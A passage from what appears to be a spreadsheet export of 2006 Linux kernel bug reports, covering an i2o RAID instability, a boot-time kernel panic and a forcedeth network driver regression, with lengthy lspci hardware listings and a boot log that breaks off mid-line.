    <t>Most recent kernel where this bug did not occur: 2.6.15 Distribution: Fedora Core 4 and 5 (also appears on gentoo with 2.6.16) Hardware Environment: i686, Adaptec 2100S SCSI RAID card Software Environment: Fedora Core 4 with 2.6.16 errata kernel, or FC5 default Problem Description: The 2.6.16 kernel appears to be unstable when used with a RAID array supported by the i2o driver such as the Adaptec 2100S. Steps to reproduce: 1) Install an OS using the 2.6.15 kernel or below. 2) Upgrade to 2.6.16 and watch the kernel oops OR 1) Attempt to install an OS using the 2.6.15 kernel and watch the kernel oops I have thoroughly bugzilla'd this at below but after further investigation (and help from others) I believe it to be an upstream (i.e. here) bug so I've raised it here also. https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=189570 There is considerable debug and traceback info available at bugzilla.redhat.com.</t>
  </si>
  <si>
    <t>Kernel Panic-not syncing</t>
  </si>
  <si>
    <t>2.6.17-rc4-mm1</t>
  </si>
  <si>
    <t>2006-05-16 11:30 UTC</t>
  </si>
  <si>
    <t>Andrey Falko</t>
  </si>
  <si>
    <t>2006-10-22 06:02 UTC</t>
  </si>
  <si>
    <t>6565 6566 6567</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.17-rc3-mm1 Distribution: Gentoo Hardware Environment: AMD64 3200+, ATI ALI Chipset, notebook (see http://afalko.homelinux.net/files/dmesg.txt or /lspci.txt) Software Environment: Gcc 3.4.6, glibc 2.4, 64-bit. Problem Description: Here is a link to a picture of what I am getting: http://afalko.homelinux.net/files/kernelPanic.jpg Steps to reproduce: Panic everytime I boot, with the following config: http://afalko.homelinux.net/files/config.txt I shall be free to get to the bottom of this bug, later today and tommorrow. I have not worked too deeply with kernels, so please forgive me if this bug report is bad, or if the error is due to my own negligence.</t>
  </si>
  <si>
    <t>forcedeth broken by commit ebf34c9b6fcd22338ef764b039b3ac55ed0e297b</t>
  </si>
  <si>
    <t>2006-05-16 15:53 UTC</t>
  </si>
  <si>
    <t>Alistair Strachan</t>
  </si>
  <si>
    <t>2006-05-20 12:17 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.17-rc3 Hardware Environment: 00:00.0 Memory controller: nVidia Corporation CK804 Memory Controller (rev a3) Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66Mhz+ UDF- FastB2B+ ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 Capabilities: [44] #08 [01e0] Capabilities: [e0] #08 [a801] 00:01.0 ISA bridge: nVidia Corporation CK804 ISA Bridge (rev a3) Subsystem: nVidia Corporation: Unknown device cb84 Control: I/O+ Mem+ BusMaster+ SpecCycle+ MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap- 66Mhz+ UDF- FastB2B+ ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 00:01.1 SMBus: nVidia Corporation CK804 SMBus (rev a2) Subsystem: nVidia Corporation: Unknown device cb84 Control: I/O+ Mem- BusMaster- SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66Mhz+ UDF- FastB2B+ ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Interrupt: pin A routed to IRQ 4 Region 0: I/O ports at fc00 [size=32] Region 4: I/O ports at 1c00 [size=64] Region 5: I/O ports at 1c40 [size=64] Capabilities: [44] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot+,D3cold+) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 00:02.0 USB Controller: nVidia Corporation CK804 USB Controller (rev a2) (prog-if 10 [OHCI]) Subsystem: nVidia Corporation: Unknown device cb84 Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66Mhz+ UDF- FastB2B+ ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 (750ns min, 250ns max) Interrupt: pin A routed to IRQ 233 Region 0: Memory at fe02f000 (32-bit, non-prefetchable) [size=4K] Capabilities: [44] Power Management version 2 Flags: PMEClk- DSI- D1+ D2+ AuxCurrent=0mA PME(D0+,D1+,D2+,D3hot+,D3cold+) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 00:02.1 USB Controller: nVidia Corporation CK804 USB Controller (rev a3) (prog-if 20 [EHCI]) Subsystem: nVidia Corporation: Unknown device cb84 Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66Mhz+ UDF- FastB2B+ ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 (750ns min, 250ns max) Interrupt: pin B routed to IRQ 225 Region 0: Memory at feb00000 (32-bit, non-prefetchable) [size=256] Capabilities: [44] #0a [2098] Capabilities: [80] Power Management version 2 Flags: PMEClk- DSI- D1+ D2+ AuxCurrent=0mA PME(D0+,D1+,D2+,D3hot+,D3cold+) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 00:04.0 Multimedia audio controller: nVidia Corporation CK804 AC'97 Audio Controller (rev a2) Subsystem: nVidia Corporation: Unknown device cb84 Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66Mhz+ UDF- FastB2B+ ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 (500ns min, 1250ns max) Interrupt: pin A routed to IRQ 58 Region 0: I/O ports at f000 [size=256] Region 1: I/O ports at ec00 [size=256] Region 2: Memory at fe02d000 (32-bit, non-prefetchable) [size=4K] Capabilities: [44] Power Management version 2 Flags: PMEClk- DSI- D1+ D2+ AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 00:06.0 IDE interface: nVidia Corporation CK804 IDE (rev a2) (prog-if 8a [Master SecP PriP]) Subsystem: nVidia Corporation: Unknown device cb84 Control: I/O+ Mem- BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66Mhz+ UDF- FastB2B+ ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 (750ns min, 250ns max) Region 4: I/O ports at e800 [size=16] Capabilities: [44] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 00:07.0 IDE interface: nVidia Corporation CK804 Serial ATA Controller (rev a3) (prog-if 85 [Master SecO PriO]) Subsystem: nVidia Corporation: Unknown device cb84 Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66Mhz+ UDF- FastB2B+ ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 (750ns min, 250ns max) Interrupt: pin A routed to IRQ 225 Region 0: I/O ports at 09f0 [size=8] Region 1: I/O ports at 0bf0 [size=4] Region 2: I/O ports at 0970 [size=8] Region 3: I/O ports at 0b70 [size=4] Region 4: I/O ports at d400 [size=16] Region 5: Memory at fe02c000 (32-bit, non-prefetchable) [size=4K] Capabilities: [44] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 00:08.0 IDE interface: nVidia Corporation CK804 Serial ATA Controller (rev a3) (prog-if 85 [Master SecO PriO]) Subsystem: nVidia Corporation: Unknown device cb84 Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66Mhz+ UDF- FastB2B+ ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 (750ns min, 250ns max) Interrupt: pin A routed to IRQ 233 Region 0: I/O ports at 09e0 [size=8] Region 1: I/O ports at 0be0 [size=4] Region 2: I/O ports at 0960 [size=8] Region 3: I/O ports at 0b60 [size=4] Region 4: I/O ports at c000 [size=16] Region 5: Memory at fe02b000 (32-bit, non-prefetchable) [size=4K] Capabilities: [44] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 00:09.0 PCI bridge: nVidia Corporation CK804 PCI Bridge (rev a2) (prog-if 01 [Subtractive decode]) Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap- 66Mhz+ UDF- FastB2B+ ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 Bus: primary=00, secondary=01, subordinate=02, sec-latency=32 I/O behind bridge: 0000a000-0000afff Memory behind bridge: d8000000-dfffffff Prefetchable memory behind bridge: fdf00000-fdffffff BridgeCtl: Parity- SERR- NoISA+ VGA- MAbort- &gt;Reset- FastB2B- 00:0a.0 Bridge: nVidia Corporation CK804 Ethernet Controller (rev a3) Subsystem: nVidia Corporation: Unknown device cb84 Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66Mhz+ UDF- FastB2B+ ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 (250ns min, 5000ns max) Interrupt: pin A routed to IRQ 66 Region 0: Memory at fe02a000 (32-bit, non-prefetchable) [size=4K] Region 1: I/O ports at bc00 [size=8] Capabilities: [44] Power Management version 2 Flags: PMEClk- DSI- D1+ D2+ AuxCurrent=0mA PME(D0+,D1+,D2+,D3hot+,D3cold+) Status: D0 PME-Enable+ DSel=0 DScale=0 PME- 00:0b.0 PCI bridge: nVidia Corporation CK804 PCIE Bridge (rev a3) (prog-if 00 [Normal decode]) Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66Mhz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0, cache line size 08 Bus: primary=00, secondary=03, subordinate=03, sec-latency=0 I/O behind bridge: 00009000-00009fff Memory behind bridge: fde00000-fdefffff Prefetchable memory behind bridge: 00000000fdd00000-00000000fdd00000 BridgeCtl: Parity- SERR- NoISA+ VGA- MAbort- &gt;Reset- FastB2B- Capabilities: [40] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0+,D1+,D2+,D3hot+,D3cold+) Status: D0 PME-Enable- DSel=0 DScale=0 PME- Capabilities: [48] Message Signalled Interrupts: 64bit+ Queue=0/1 Enable+ Address: 00000000fee00000 Data: 40c1 Capabilities: [58] #08 [a800] Capabilities: [80] #10 [0141] 00:0c.0 PCI bridge: nVidia Corporation CK804 PCIE Bridge (rev a3) (prog-if 00 [Normal decode]) Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66Mhz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0, cache line size 08 Bus: primary=00, secondary=04, subordinate=04, sec-latency=0 I/O behind bridge: 00008000-00008fff Memory behind bridge: fdc00000-fdcfffff Prefetchable memory behind bridge: 00000000fdb00000-00000000fdb00000 BridgeCtl: Parity- SERR- NoISA+ VGA- MAbort- &gt;Reset- FastB2B- Capabilities: [40] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0+,D1+,D2+,D3hot+,D3cold+) Status: D0 PME-Enable- DSel=0 DScale=0 PME- Capabilities: [48] Message Signalled Interrupts: 64bit+ Queue=0/1 Enable+ Address: 00000000fee00000 Data: 40c9 Capabilities: [58] #08 [a800] Capabilities: [80] #10 [0141] 00:0d.0 PCI bridge: nVidia Corporation CK804 PCIE Bridge (rev a3) (prog-if 00 [Normal decode]) Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66Mhz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0, cache line size 08 Bus: primary=00, secondary=05, subordinate=05, sec-latency=0 I/O behind bridge: 00007000-00007fff Memory behind bridge: fda00000-fdafffff Prefetchable memory behind bridge: 00000000fd900000-00000000fd900000 BridgeCtl: Parity- SERR- NoISA+ VGA- MAbort- &gt;Reset- FastB2B- Capabilities: [40] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0+,D1+,D2+,D3hot+,D3cold+) Status: D0 PME-Enable- DSel=0 DScale=0 PME- Capabilities: [48] Message Signalled Interrupts: 64bit+ Queue=0/1 Enable+ Address: 00000000fee00000 Data: 40d1 Capabilities: [58] #08 [a800] Capabilities: [80] #10 [0141] 00:0e.0 PCI bridge: nVidia Corporation CK804 PCIE Bridge (rev a3) (prog-if 00 [Normal decode]) Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66Mhz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0, cache line size 08 Bus: primary=00, secondary=06, subordinate=06, sec-latency=0 I/O behind bridge: 00006000-00006fff Memory behind bridge: fa000000-fcffffff Prefetchable memory behind bridge: 00000000c0000000-00000000cff00000 BridgeCtl: Parity- SERR- NoISA+ VGA+ MAbort- &gt;Reset- FastB2B- Capabilities: [40] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0+,D1+,D2+,D3hot+,D3cold+) Status: D0 PME-Enable- DSel=0 DScale=0 PME- Capabilities: [48] Message Signalled Interrupts: 64bit+ Queue=0/1 Enable+ Address: 00000000fee00000 Data: 40d9 Capabilities: [58] #08 [a800] Capabilities: [80] #10 [0141] 00:18.0 Host bridge: Advanced Micro Devices [AMD] K8 [Athlon64/Opteron] HyperTransport Technology Configuration Control: I/O- Mem- BusMaster- SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66Mhz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Capabilities: [80] #08 [2101] 00:18.1 Host bridge: Advanced Micro Devices [AMD] K8 [Athlon64/Opteron] Address Map Control: I/O- Mem- BusMaster- SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap- 66Mhz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- 00:18.2 Host bridge: Advanced Micro Devices [AMD] K8 [Athlon64/Opteron] DRAM Controller Control: I/O- Mem- BusMaster- SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap- 66Mhz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- 00:18.3 Host bridge: Advanced Micro Devices [AMD] K8 [Athlon64/Opteron] Miscellaneous Control Control: I/O- Mem- BusMaster- SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap- 66Mhz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- 01:06.0 Multimedia audio controller: Creative Labs SB Audigy (rev 04) Subsystem: Creative Labs: Unknown device 1002 Control: I/O+ Mem- BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66Mhz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 32 (500ns min, 5000ns max) Interrupt: pin A routed to IRQ 50 Region 0: I/O ports at a800 [size=64] Capabilities: [dc] Power Management version 2 Flags: PMEClk- DSI+ D1+ D2+ AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 01:06.1 Input device controller: Creative Labs SB Audigy MIDI/Game port (rev 04) Subsystem: Creative Labs: Unknown device 0060 Control: I/O+ Mem- BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66Mhz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 32 Region 0: I/O ports at a400 [size=8] Capabilities: [dc] Power Management version 2 Flags: PMEClk- DSI+ D1+ D2+ AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 01:06.2 FireWire (IEEE 1394): Creative Labs SB Audigy FireWire Port (rev 04) (prog-if 10 [OHCI]) Subsystem: Creative Labs SB Audigy FireWire Port Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66Mhz- UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 32 (500ns min, 1000ns max), cache line size 08 Interrupt: pin B routed to IRQ 177 Region 0: Memory at dffff000 (32-bit, non-prefetchable) [size=2K] Region 1: Memory at dfff8000 (32-bit, non-prefetchable) [size=16K] Capabilities: [44] Power Management version 2 Flags: PMEClk- DSI- D1+ D2+ AuxCurrent=0mA PME(D0+,D1+,D2+,D3hot+,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME+ 01:07.0 CardBus bridge: Ricoh Co Ltd RL5c475 (rev 81) Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66Mhz- UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 168 Interrupt: pin A routed to IRQ 177 Region 0: Memory at dfffe000 (32-bit, non-prefetchable) [size=4K] Bus: primary=01, secondary=02, subordinate=05, sec-latency=176 Memory window 0: d8000000-d9fff000 (prefetchable) Memory window 1: da000000-dbfff000 I/O window 0: 0000ac00-0000acff I/O window 1: 00002000-000020ff BridgeCtl: Parity- SERR- ISA- VGA- MAbort- &gt;Reset- 16bInt+ PostWrite+ 16-bit legacy interface ports at 0001 01:09.0 FireWire (IEEE 1394): VIA Technologies, Inc. IEEE 1394 Host Controller (rev 80) (prog-if 10 [OHCI]) Subsystem: DFI Inc: Unknown device 1006 Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping+ SERR- FastB2B- Status: Cap+ 66Mhz- UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 32 (8000ns max), cache line size 08 Interrupt: pin A routed to IRQ 74 Region 0: Memory at dfffc000 (32-bit, non-prefetchable) [size=2K] Region 1: I/O ports at a000 [size=128] Capabilities: [50] Power Management version 2 Flags: PMEClk- DSI- D1- D2+ AuxCurrent=0mA PME(D0-,D1-,D2+,D3hot+,D3cold+) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 01:0a.0 Ethernet controller: Marvell Technology Group Ltd. 88E8001 Gigabit Ethernet Controller (rev 13) Subsystem: DFI Inc: Unknown device 100a Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66Mhz+ UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 32 (5750ns min, 7750ns max), cache line size 08 Interrupt: pin A routed to IRQ 50 Region 0: Memory at dfff4000 (32-bit, non-prefetchable) [size=16K] Region 1: I/O ports at 2400 [size=256] Expansion ROM at fdf00000 [disabled] [size=128K] Capabilities: [48] Power Management version 2 Flags: PMEClk- DSI- D1+ D2+ AuxCurrent=0mA PME(D0+,D1+,D2+,D3hot+,D3cold+) Status: D0 PME-Enable- DSel=0 DScale=1 PME- Capabilities: [50] Vital Product Data 06:00.0 VGA compatible controller: nVidia Corporation NV41.0 (rev a2) (prog-if 00 [VGA]) Subsystem: nVidia Corporation: Unknown device 0339 Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66Mhz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 Interrupt: pin A routed to IRQ 50 Region 0: Memory at fa000000 (32-bit, non-prefetchable) [size=16M] Region 1: Memory at c0000000 (64-bit, prefetchable) [size=256M] Region 3: Memory at fb000000 (64-bit, non-prefetchable) [size=16M] Expansion ROM at fc000000 [disabled] [size=128K] Capabilities: [60] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- Capabilities: [68] Message Signalled Interrupts: 64bit+ Queue=0/0 Enable- Address: 0000000000000000 Data: 0000 Capabilities: [78] #10 [0001] [ 0.000000] Bootdata ok (command line is vga=794 root=/dev/sda1 quiet) [ 0.000000] Linux version 2.6.17-rc4 (alistair@damocles) (gcc version 4.1.0) #1 SMP PREEMPT Fri May 12 02:09:03 BST 2006 [ 0.000000] BIOS-provided physical RAM map: [ 0.000000] BIOS-e820: 0000000000000000 - 000000000009f400 (usable) [ 0.000000] BIOS-e820: 000000000009f400 - 00000000000a0000 (reserved) [ 0.000000] BIOS-e820: 00000000000f0000 - 0000000000100000 (reserved) [ 0.000000] BIOS-e820: 0000000000100000 - 000000007fee0000 (usable) [ 0.000000] BIOS-e820: 000000007fee0000 - 000000007fee3000 (ACPI NVS) [ 0.000000] BIOS-e820: 000000007fee3000 - 000000007fef0000 (ACPI data) [ 0.000000] BIOS-e820: 000000007fef0000 - 000000007ff00000 (reserved) [ 0.000000] BIOS-e820: 00000000e0000000 - 00000000f0000000 (reserved) [ 0.000000] BIOS-e820: 00000000fec00000 - 0000000100000000 (reserved) [ 0.000000] DMI 2.2 present. [ 0.000000] ACPI: RSDP (v000 Nvidia ) @ 0x00000000000f8160 [ 0.000000] ACPI: RSDT (v001 Nvidia AWRDACPI 0x42302e31 AWRD 0x00000000) @ 0x000000007fee3040 [ 0.000000] ACPI: FADT (v001 Nvidia AWRDACPI 0x42302e31 AWRD 0x00000000) @ 0x000000007fee30c0 [ 0.000000] ACPI: MCFG (v001 Nvidia AWRDACPI 0x42302e31 AWRD 0x00000000) @ 0x000000007fee92c0 [ 0.000000] ACPI: MADT (v001 Nvidia AWRDACPI 0x42302e31 AWRD 0x00000000) @ 0x000000007fee9200 [ 0.000000] ACPI: DSDT (v001 NVIDIA AWRDACPI 0x00001000 MSFT 0x0100000e) @ 0x0000000000000000 [ 0.000000] On node 0 totalpages: 515469 [ 0.000000] DMA zone: 2673 pages, LIFO batch:0 [ 0.000000] DMA32 zone: 512796 pages, LIFO batch:31 [ 0.000000] Nvidia board detected. Ignoring ACPI timer override. [ 0.000000] ACPI: PM-Timer IO Port: 0x1008 [ 0.000000] ACPI: Local APIC address 0xfee00000 [ 0.000000] ACPI: LAPIC (acpi_id[0x00] lapic_id[0x00] enabled) [ 0.000000] Processor #0 15:3 APIC version 16 [ 0.000000] ACPI: LAPIC (acpi_id[0x01] lapic_id[0x01] enabled) [ 0.000000] Processor #1 15:3 APIC version 16 [ 0.000000] ACPI: LAPIC_NMI (acpi_id[0x00] high edge lint[0x1]) [ 0.000000] ACPI: LAPIC_NMI (acpi_id[0x01] high edge lint[0x1]) [ 0.000000] ACPI: IOAPIC (id[0x02] address[0xfec00000] gsi_base[0]) [ 0.000000] IOAPIC[0]: apic_id 2, version 17, address 0xfec00000, GSI 0-23 [ 0.000000] ACPI: INT_SRC_OVR (bus 0 bus_irq 9 global_irq 9 high level) [ 0.000000] ACPI: INT_SRC_OVR (bus 0 bus_irq 14 global_irq 14 high edge) [ 0.000000] ACPI: INT_SRC_OVR (bus 0 bus_irq 15 global_irq 15 high edge) [ 0.000000] ACPI: IRQ9 used by override. [ 0.000000] ACPI: IRQ14 used by override. [ 0.000000] ACPI: IRQ15 used by override. [ 0.000000] Setting APIC routing to physical flat [ 0.000000] Using ACPI (MADT) for SMP configuration information [ 0.000000] Allocating PCI resources starting at 80000000 (gap: 7ff00000:60100000) [ 0.000000] SMP: Allowing 2 CPUs, 0 hotplug CPUs [ 0.000000] Built 1 zonelists [ 0.000000] Kernel command line: vga=794 root=/dev/sda1 quiet [ 0.000000] Initializing CPU#0 [ 0.000000] PID hash table entries: 4096 (order: 12, 32768 bytes) [ 0.000000] Disabling vsyscall due to use of PM timer [ 0.000000] time.c: Using 3.579545 MHz WALL PM GTOD PM timer. [ 0.000000] time.c: Detected 2500.774 MHz processor. [ 26.097224] Console: colour dummy device 80x25 [ 26.098059] Dentry cache hash table entries: 262144 (order: 9, 2097152 bytes) [ 26.099308] Inode-cache hash table entries: 131072 (order: 8, 1048576 bytes) [ 26.114491] Memory: 2058408k/2096000k available (2377k kernel code, 36968k reserved, 1151k data, 164k init) [ 26.174093] Calibrating delay using timer specific routine.. 5003.57 BogoMIPS (lpj=2501785) [ 26.174128] Mount-cache hash table entries: 256 [ 26.174206] CPU: L1 I Cache: 64K (64 bytes/line), D cache 64K (64 bytes/line) [ 26.174209] CPU: L2 Cache: 512K (64 bytes/line) [ 26.192907] Using local APIC timer interrupts. [ 26.232853] result 15629861 [ 26.232854] Detected 15.629 MHz APIC timer. [ 26.233106] Booting processor 1/2 APIC 0x1 [ 26.241900] Initializing CPU#1 [ 26.302476] Calibrating delay using timer specific routine.. 5000.69 BogoMIPS (lpj=2500349) [ 26.302481] CPU: L1 I Cache: 64K (64 bytes/line), D cache 64K (64 bytes/line) [ 26.302483] CPU: L2 Cache: 512K (64 bytes/line) [ 26.302542] AMD Athlon(tm) 64 X2 Dual Core Processor 3800+ stepping 02 [ 26.303481] CPU 1: Syncing TSC to CPU 0. [ 26.304999] CPU 1: synchronized TSC with CPU 0 (last diff 0 cycles, maxerr 536 cycles) [ 26.305003] Brought up 2 CPUs [ 26.305033] testing NMI watchdog ... OK. [ 26.913720] migration_cost=138 [ 26.914016] NET: Registered protocol family 16 [ 26.914034] ACPI: bus type pci registered [ 26.916348] PCI: Using MMCONFIG at e0000000 [ 26.916368] PCI: No mmconfig possible on device 0:18 [ 26.916870] ACPI: Subsystem revision 20060127 [ 26.922781] ACPI: Interpreter enabled [ 26.922783] ACPI: Using IOAPIC for interrupt routing [ 26.923202] ACPI: PCI Root Bridge [PCI0] (0000:00) [ 26.923204] PCI: Probing PCI hardware (bus 00) [ 26.927660] PCI: Transparent bridge - 0000:00:09.0 [ 26.927692] PCI: Bus #02 (-#05) is hidden behind transparent bridge #01 (-#02) (try 'pci=assign-busses') [ 26.927694] Please report the result to linux-kernel to fix this permanently [ 26.927871] Boot video device is 0000:06:00.0 [ 26.927920] ACPI: PCI Interrupt Routing Table [\_SB_.PCI0._PRT] [ 26.984899] ACPI: PCI Interrupt Routing Table [\_SB_.PCI0.HUB0._PRT] [ 26.986576] ACPI: PCI Interrupt Link [LNK1] (IRQs 3 4 5 7 9 10 11 12 14 15) *0, disabled. [ 26.986848] ACPI: PCI Interrupt Link [LNK2] (IRQs 3 4 5 7 9 *10 11 12 14 15) [ 26.987122] ACPI: PCI Interrupt Link [LNK3] (IRQs 3 4 *5 7 9 10 11 12 14 15) [ 26.987390] ACPI: PCI Interrupt Link [LNK4] (IRQs 3 *4 5 7 9 10 11 12 14 15) [ 26.987662] ACPI: PCI Interrupt Link [LNK5] (IRQs 3 4 5 7 9 10 11 12 14 15) *0, disabled. [ 26.987931] ACPI: PCI Interrupt Link [LUBA] (IRQs *3 4 5 7 9 10 11 12 14 15) [ 26.988203] ACPI: PCI Interrupt Link [LUBB] (IRQs 3 4 5 7 9 10 11 12 14 15) *0, disabled. [ 26.988471] ACPI: PCI Interrupt Link [LMAC] (IRQs 3 4 5 7 9 10 *11 12 14 15) [ 26.988740] ACPI: PCI Interrupt Link [LACI] (IRQs *3 4 5 7 9 10 11 12 14 15) [ 26.989011] ACPI: PCI Interrupt Link [LMCI] (IRQs 3 4 5 7 9 10 11 12 14 15) *0, disabled. [ 26.989285] ACPI: PCI Interrupt Link [LSMB] (IRQs 3 *4 5 7 9 10 11 12 14 15) [ 26.989554] ACPI: PCI Interrupt Link [LUB2] (IRQs 3 4 *5 7 9 10 11 12 14 15) [ 26.989824] ACPI: PCI 